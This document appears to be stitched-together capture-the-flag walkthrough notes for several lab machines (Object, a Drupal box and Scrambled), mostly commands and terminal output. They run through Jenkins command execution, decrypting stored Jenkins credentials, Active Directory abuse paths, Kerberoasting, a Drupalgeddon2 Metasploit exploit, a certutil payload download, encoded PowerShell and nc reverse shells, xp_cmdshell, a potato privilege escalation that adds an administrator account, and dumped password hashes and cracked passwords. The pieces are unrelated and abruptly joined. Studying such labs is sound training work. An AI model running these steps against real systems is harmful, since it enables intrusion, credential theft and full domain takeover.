PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Mega Engines
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http Jetty 9.4.43.v20210629
|_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.43.v20210629)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
PORT 80 (HTTP)
On port 80 we can see a domain name object.htb so let’s add this domain name in /etc/hosts file and start fuzzing for files and directories using gobuster also it tells about to “login and submit code on the automation server” which is running at port 8080
Gobuster didn’t find anything so next we can enumerate for subdomains
I kept running wfuzz so while it’s running we can look at port 8080, on this port we have an instance on jenkins running
PORT 8080 (HTTP)
I tried the default admin:admin credentials but it didn’t work so we can just create an account
We are logged and on bottom right corner we can see the version of jenkins which is 2.317
Also there wasn’t any subdomain which wfuzz found
So we can make a Freestyle project by going to New Item
After naming the project you’ll be presented to Build Triggers, Build Environment, Source code management and etc. Select Build Triggers and then select Build periodically , it will allow to create a schedule task which you can configure similar to a cron job and this will start building your project, we can configure the job to run after a minute * * * * *
Next under Build, we can see an option for Add Build step in which we can select Execute Windows Batch command
Going back to dashboard we can see a successful build
This shows that we are executing commands as oliver
So next I tried to see if I can ping my machine from here
We can so now let’s transfer nc64.exe on this machine
But it wasn’t able to make a connection to this port
So I changed the port to 9001 and it still didn’t make a connection
It could be that there’s a firewall configure to not allow any outbound traffic, so we can use powershell’s cmdlet Get-NetFirewallRule to list firewall rules and we need to check for outbound
So we can’t get a reverse shell as the traffic won’t go out , next we can do is look where jenkins stores passwords or how it stores them so we can retrieve and decrpyt those, I found a question asked on stackoverflow about this
And this wants credentials.xml, master.key and hudson.util.Secret
We still don’t see a credentials.xml file , so to transfer these on our machine we need to base64 encode this and then read those files
Now we can just decode them from base64 and get the original file
But still we need to credentials.xml file but couldn’t find on the box, so looking into directories there was a folder named users
There’s a config.xml so let’s just grab it and see if it’s of any use for us
It wasn’t what we needed so going into admin’s folder might be something what we need
Foothold
Now we see another config file, so there’s no need to encode it we can just read this as it will be in plain text
So this is contains the hashed password that we can crack using the tool we found on github
Like this we were able to recover the plain text password which is c1cdfun_d2434, since winrm is open on the machine we can just use this password for oliver user and get a shell on the machine
Looking at C:\Users we do see other users as well
We can check for local ports on the machine by running nestat -aof
Port 88 being open on this machine tells us that it’s an active directory machine and this is a domain controller as kerberos runs on a DC.
So to enumerate the AD domain we need to somehow transfer sharphound.exe on the machine
┌──(puck㉿kali)-[~/htb/object]
└─$ evil-winrm -i 10.10.11.132 -u oliver -p c1cdfun_d2434
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\oliver\Documents> $env:USERDNSDOMAIN
object.local
*Evil-WinRM* PS C:\Users\oliver\Documents> mkdir puck
Directory: C:\Users\oliver\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/23/2024 8:54 AM puck
*Evil-WinRM* PS C:\Users\oliver\Documents> cd puck
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> upload SharpHound.exe
Info: Uploading /home/puck/htb/object/SharpHound.exe to C:\Users\oliver\Documents\puck\SharpHound.exe
Data: 1395368 bytes of 1395368 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> ./SharpHound.exe all
2024-03-23T08:55:50.0837796-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-03-23T08:55:50.2243965-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T08:55:50.2556464-07:00|INFORMATION|Initializing SharpHound at 8:55 AM on 3/23/2024
2024-03-23T08:55:50.4119095-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for object.local : jenkins.object.local
2024-03-23T08:55:50.4431626-07:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-03-23T08:55:50.5993967-07:00|INFORMATION|Beginning LDAP search for object.local
2024-03-23T08:55:50.6462777-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-03-23T08:55:50.6618979-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-03-23T08:56:21.3267021-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-03-23T08:56:36.5571557-07:00|INFORMATION|Consumers finished, closing output channel
2024-03-23T08:56:36.5884055-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-03-23T08:56:36.7915241-07:00|INFORMATION|Status: 92 objects finished (+92 2)/s -- Using 44 MB RAM
2024-03-23T08:56:36.7915241-07:00|INFORMATION|Enumeration finished in 00:00:46.2025467
2024-03-23T08:56:36.8696534-07:00|INFORMATION|Saving cache with stats: 52 ID to type mappings.
52 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-03-23T08:56:36.8852775-07:00|INFORMATION|SharpHound Enumeration Completed at 8:56 AM on 3/23/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> ls
Directory: C:\Users\oliver\Documents\puck
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/23/2024 8:56 AM 11437 20240323085636_BloodHound.zip
-a---- 3/23/2024 8:56 AM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 3/23/2024 8:55 AM 1046528 SharpHound.exe
*Evil-WinRM* PS C:\Users\oliver\Documents\puck> download 20240323085636_BloodHound.zip
Info: Downloading C:\Users\oliver\Documents\puck\20240323085636_BloodHound.zip to 20240323085636_BloodHound.zip
Info: Download successful!
*Evil-WinRM* PS C:\Users\oliver\Documents\puck>
.
Start bloodhound by running neo4j first and then bloodhoud GUI and upload the json files from the zip archive
Running any of the pre-build query we can see the data is loaded and it returns the result
We can search for oliver node and mark it as owned so we can look for paths to gain privileges
Privilege Escalation (Smith)
Running the query shortest path to domain admin, we can see a path from oliver to smith that we can change smith’s password, further smith has write options on maria user object and maria is a writeowner of domain admin
I tried to change smith’s password with net user but it didn’t work
We could try to use powerview module to do that which is suggested in bloodhound help to abuse ForceChangePassword
And now to login as smith
Now to abuse GenericWrite, we can make this user account a SPN to get a TGS ticket
I followed the abuse described in bloodhound
This added a SPN to this user account, but when I tried to kerberoast it didn’t work
We still can abuse this by setting up a logon script, this will execute when maria will logon to the machine
Set-DomainObject -Identity maria -SET @{scriptpath="C:\ProgramData\logonscript.ps1"}
This will execute the powershell script which will list the contents in Desktop folder of maria, I did however tried to change maria’s password through net user maria Password123! but this didn’t work
dir C:\Users\maria\Desktop > C:\ProgramData\dir_result.txt
We can see a text has been created which shows that there’s an excel file in Desktop folder of maria user
Now just replace the current command in the ps1 script with this
We can see that we are a member of domains admins group so we can read the root and user flag but you need to login again because the changes will be effected after you login again
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat ports.nmap
# Nmap 7.92 scan initiated Mon Aug 29 10:17:40 2022 as: nmap -sC -sV -oN ports.nmap 10.150.150.182
Nmap scan report for 10.150.150.182
Host is up (0.086s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey:
| 2048 8e:0a:83:30:6b:a5:ef:12:81:4a:8e:66:c6:f4:22:12 (RSA)
| 256 ef:77:5e:a9:59:19:de:f8:c3:f3:1c:2e:73:09:8a:8f (ECDSA)
|_ 256 b3:be:3b:05:0c:f7:62:24:ce:1b:5c:5b:df:cc:fc:23 (ED25519)
80/tcp open http nginx 1.4.0 (Ubuntu)
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
| working. Further configuration is required.</p>
| <p>For online documentation and support please refer to
| href="http://nginx.org/">nginx.org</a>.<br/>
| Commercial support is available at
| href="http://nginx.com/">nginx.com</a>.</p>
| <p><em>Thank you for using nginx.</em></p>
| </body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Allow: OPTIONS,HEAD,HEAD,GET,HEAD,POST
| Content-Length: 0
| Connection: close
| Content-Type: text/html
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Content-Length: 299
| Connection: close
| Content-Type: text/html; charset=iso-8859-1
| <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
| <html><head>
| <title>400 Bad Request</title>
| </head><body>
| <h1>Bad Request</h1>
| <p>Your browser sent a request that this server could not understand.<br />
| </p>
| <hr>
| <address>nginx 1.4.0 (Ubuntu) Server at 127.0.1.1 Port 80</address>
|_ </body></html>
|_http-title: Welcome to nginx!
|_http-server-header: nginx 1.4.0 (Ubuntu)
8080/tcp open http-proxy nginx 1.4.0 (Ubuntu)
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Date: Mon, 29 Aug 2022 09:00:40 GMT
| Server: nginx 1.4.0 (Ubuntu)
| Last-Modified: Sat, 01 Aug 2020 20:47:30 GMT
| ETag: "264-5abd7039b3849"
| Accept-Ranges: bytes
| Content-Length: 612
| Vary: Accept-Encoding
| Connection: close
| Content-Type: text/html
| <!DOCTYPE html>
| <html>
| <head>
| <title>Welcome to nginx!</title>
| <style>
| body {
| width: 35em;
| margin: 0 auto;
| font-family: Tahoma, Verdana, Arial, sans-serif;
| </style>
| </head>
| <body>
| <h1>Welcome to nginx!</h1>
| <p>If you see this page, the nginx web server is successfully installed and
|--snipp--
\x2080</address>\n</body></
SF:html>\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Aug 29 10:19:25 2022 -- 1 IP address (1 host up) scanned in 105.42 seconds
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
.
┌─[puck@parrot-lt]─[~/ptd/10.150.150.182]
└──╼ $cat notes.txt
chilakiller
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set T
set TARGET set TARGETURI set TIMESTAMPOUTPUT
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> set TARGETURI /restaurante
TARGETURI => /restaurante
[msf](Jobs:0 Agents:0) exploit(unix/webapp/drupal_drupalgeddon2) >> run
[*] Started reverse TCP handler on 10.66.67.22:4444
[*] Running automatic check (“set AutoCheck false” to disable)
[+] The target is vulnerable.
[*] Sending stage (39927 bytes) to 10.150.150.182
[*] Meterpreter session 1 opened (10.66.67.22:4444 -> 10.150.150.182:32828) at 2022-08-29 12:16:38 +0200
ls
ls
(Meterpreter 1)(/var/www/html/restaurante) >
www-data@chilakiller:/var/www/html/restaurante/sites/default$ cat settings.php | grep password
<nte/sites/default$ cat settings.php | grep password
* ‘password’ => ‘password’,
* username, password, host, and database name.
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
* ‘password’ => ‘password’,
‘password’ => ‘EstaContraNoesTanImp0rtant3!!!’,
* by using the username and password variables. The proxy_user_agent variable
# $conf[‘proxy_password’] = ”;
www-data@chilakiller:/var/www/html/restaurante/sites/default$
www-data@chilakiller:/var/www/html/restaurante/sites/default$ mysql -u drupal -p
</html/restaurante/sites/default$ mysql -u drupal -p
Enter password: EstaContraNoesTanImp0rtant3!!!
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 43
Server version: 10.1.45-MariaDB-0+deb9u1 Debian 9.12
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.
www-data@chilakiller:/var/www/html/restaurante/sites/default$ su user1
su user1
Password: user1
user1@chilakiller:/var/www/html/restaurante/sites/default$ cd /home/user1
cd /home/user1
user1@chilakiller:~$ ls
ls
Desktop Documents FLAG3.txt
user1@chilakiller:~$ cat FLAG3.txt
cat FLAG3.txt
9a8cda5f343e89e68aaec65f1df3c61ae5176a19
user1@chilakiller:~$
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-15 23:15:44Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
4411/tcp open found? syn-ack ttl 127
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
| SCRAMBLECORP_ORDERS_V1.0.3;
| FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions:
| SCRAMBLECORP_ORDERS_V1.0.3;
|_ ERROR_UNKNOWN_COMMAND;
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49552/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
There are many open ports, this is seemingly a target on AD, with ldap and kerberos enabled. We need to do enum at several interesting places.
Found several domain names that might be useful later.
04/09/2021: Due to the security breach last month we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use so please be patient while we work to resolve any issues
http://scrm.local/salesorders.html, this page shows a client application used for this organisation. Later, we will find there is a server running on port 4411.
If you are experiencing a problem with the sales orders app, please enable debug logging and reproduce the problem. You can enable debug logging by doing the following:
A log file named ScrambleDebugLog will have been created in the same folder you launched the sales app from. Send this file to us via email along with a description of the problem
So, this target may not have much to do with web vectors.
Host Enum
Perform host enum, didn’t find anything useful
> enum4linux 10.10.11.168
Port 4411 Enum
Use nc to connect to the non-conventional port 4411, there seems to be a server application running here. But we cannot confirm what application it is.
> nc -vn 10.10.11.168 4411
LDAP Enum
Perform ldap enum using a simple python module
Python 3.10.4 (main, Mar 24 2022, 13:07:27) [GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ldap3
>>> server = ldap3.Server('10.10.11.168', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3, 2
Naming contexts:
DC=scrm,DC=local
CN=Configuration,DC=scrm,DC=local
CN=Schema,CN=Configuration,DC=scrm,DC=local
DC=DomainDnsZones,DC=scrm,DC=local
DC=ForestDnsZones,DC=scrm,DC=local
nmap scan using ldap scripts confirms the above results
> nmap -n -sV --script "ldap* and not brute" 10.10.11.168
And, we know there might be a user called ksimpson from the previous screenshot. We can confirm this. This user also happens to use a password that is same as the username.
Save the ticket to a file mssqlsvc-hash and crack using john
┌──(puck㉿kali)-[~/htb/scrambled]
└─$
john –format=krb5tgs –wordlist=/usr/share/wordlists/rockyou.txt mssqlsvc-hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Pegasus60 (?)
1g 0:00:00:03 DONE (2023-10-13 16:12) 0.2652g/s 2846Kp/s 2846Kc/s 2846KC/s Petergrant..Pearce
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(puck㉿kali)-[~/htb/scrambled]
We now have a service principal credential, sqlsvc:Pegasus60
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@SCRM.LOCAL
Valid starting Expires Service principal
10/13/2023 16:28:55 10/10/2033 16:28:55 MSSQLSVC/dc1.scrm.local@SCRM.LOCAL
renew until 10/10/2033 16:28:55
┌──(puck㉿kali)-[~/htb/scrambled]
┌──(puck㉿kali)-[~/htb/scrambled]
└─$
impacket-mssqlclient dc1.scrm.local -k
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>
select name, database_id from sys.databases;
name database_id
---------- -----------
master 1
tempdb 2
model 3
msdb 4
ScrambleHR 5
SQL (SCRM\administrator dbo@master)>
SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
Upload SharpHound.exe, I used this version: /usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.exe, and run SharpHound and transfer back to kali for analysis
From BloodHound analysis, we can find there is a tstar user from IT group, which has CanPSRemote right. However, this has proven to be useless after some trial and error.
PE
Upload winpeas
> certutil.exe -urlcache -f http://10.10.16.3/p.exe p.exe
# found something intersting from WinPeas
ScrmOrders(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Auto - Running - No quotes and Space detected
[+] Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
HR (Path: C:\Shares\HR) -- Permissions: AllAccess
IPC$ (Path: )
IT (Path: C:\Shares\IT) -- Permissions: AllAccess
NETLOGON (Path: C:\Windows\SYSVOL\sysvol\scrm.local\SCRIPTS)
Public (Path: C:\Shares\Public) -- Permissions: AllAccess
Sales (Path: C:\Shares\Sales) -- Permissions: AllAccess
SYSVOL (Path: C:\Windows\SYSVOL\sysvol)
There is a pdf document in C:\Shares\Public, it says HR has a database, which may contain user passwords
Check db for user passwords
> sqlcmd -q "select name from sys.databases"
Check tables in ScrambleHR
> sqlcmd -q "use ScrambleHR;select table_name from information_schema.tables"
# found
Employees
UserImport
Timesheets
Check table content of UserImport, found user MiscSvc with ldap credential
> sqlcmd -q "use ScrambleHR;select db_name();select * from UserImport;"
MiscSvc is an IT User, which mean, it has CanPSRemote permission, but evil-winrm doesn’t work.
in order to get a reverse shell, you can use the “PowerShell #3 (Base64)” from revshells.com.
SQL> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAG[...]
kali@kali:~/Documents/HTB/Scrambled$ nc -nlvp 443
listening on [any]443...
connect to [10.10.14.64] from (UNKNOWN)[10.10.11.168]57867whoami
scrm\sqlsvc
PS C:\Windows\system32>
Now, we need to create another reverse shell in order to become MiscSvc, obtaining the user flag.
Wh04m1 got root blood on Scrambled using this technique. This post on MSSQL Tips talks about how to read a file using MSSQL using the BULK option, which was added to SQL Server 2005. Their example query is:
OPENROWSET returns a single column named BulkColumn. MyFile is a correlation name, which isn’t really important here other than it must exist, and it doesn’t really matter what I put there.
OPENROWSET, when used with the BULK provider takes a file path and one of three keywords:
To get to a place where I could run RoguePotato, I’ll need to be executing with the SeImpersonatePrivilege. I’m most likely to find this through the MSSQL service.
To run commands via MSSQL, I’ll use the xp_cmdshell stored procedure.
Rogue&JuicyPotato will work on Scrambled, but I’ll use this opportunity to show GODPOTATO.
┌──(puck㉿kali)-[~/htb/scrambled]
└─$ impacket-mssqlclient -k dc1.scrm.local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)> SELECT * from ScrambleHR.dbo.UserImport;
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0
SQL (SCRM\administrator dbo@master)> whoami /priv
ERROR(DC1): Line 1: Incorrect syntax near '/'.
SQL (SCRM\administrator dbo@master)> whoami
ERROR(DC1): Line 1: Could not find stored procedure 'whoami'.
SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami
ERROR(DC1): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (SCRM\administrator dbo@master)> EXECUTE sp_configure 'show advanced options', 1
INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> RECONFIGURE
SQL (SCRM\administrator dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> RECONFIGURE
SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami
output
-----------
scrm\sqlsvc
NULL
SQL (SCRM\administrator dbo@master)> xp_cmdshell C:\\programdata\\rcat_10.10.14.2_9001.exe
.
rlwrap nc -nlvp 9001
listening on [any] 9001 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.168] 58416
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Windows\system32> cd c:\programdata
cd c:\programdata
PS C:\programdata>PS C:\programdata> .\god.exe -cmd "net user puck Start123 /add"
PS C:\programdata> .\god.exe -cmd "net localgroup Administrators puck /add"
.
impacket-psexec scrm.local/puck:Start123@dc1.scrm.local -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Requesting shares on dc1.scrm.local.....
[*] Found writable share ADMIN$
[*] Uploading file mwRrJIMc.exe
[*] Opening SVCManager on dc1.scrm.local.....
[*] Creating service BSRw on dc1.scrm.local.....
[*] Starting service BSRw.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
get same hashes
impacket-secretsdump scrm.local/puck:Start123@dc1.scrm.local -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x33d8cbadba9e3f89bd60e5bfe64743e3
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ebb16eb3b0b1d0bea029cab7d18e534c:::
...